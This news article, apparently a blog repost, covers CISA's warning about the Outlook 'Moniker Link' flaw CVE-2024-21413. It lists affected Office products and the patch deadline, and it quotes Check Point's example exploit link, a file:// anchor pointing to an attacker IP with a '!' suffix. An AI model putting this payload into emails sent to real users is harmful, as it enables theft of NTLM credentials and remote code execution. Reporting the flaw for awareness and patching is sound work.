The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned of a remote code execution (RCE) vulnerability in Microsoft Outlook identified as CVE-2024-21413 that stems from invalid input checking when opening emails containing malicious links in older versions of Outlook.
CVE-2024-21413 is rated with a CVSS 3.1 score of 9.8. An attacker can execute code remotely because this vulnerability allows them to bypass Protected View, which blocks malicious content embedded in Office files by opening them in read-only mode. Instead, the malicious Office file will be opened in edit mode.
When patching CVE-2024-21413 a year ago, Microsoft also warned that the Preview Pane could be an attack vector, allowing attackers to exploit the vulnerability even when only previewing malicious Office documents.
As explained by Check Point, the vulnerability (dubbed Moniker Link) allows an attacker to bypass Outlook's built-in protections against malicious links embedded in emails by using the file:// protocol and adding an exclamation point to a URL pointing to an attacker-controlled server.
An exclamation mark is added immediately after the file extension, followed by a random piece of text (in Check Point's example, they used the word "something"), as illustrated below:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
The vulnerability affects multiple Office products, including:
Microsoft Office LTSC 2021
Microsoft 365 Apps for Enterprise
Microsoft Outlook 2016
Microsoft Office 2019
If successfully exploited, the vulnerability could lead to NTLM credentials theft and arbitrary code execution via malicious Office documents. CISA has added CVE-2024-21413 to the Known Exploited Vulnerabilities (KEV) list and required federal agencies to patch the vulnerability by February 27 under BOD directive 22-1, while also recommending private organizations update their software as soon as possible to avoid risks.
According to Bleeping Computer
No comments: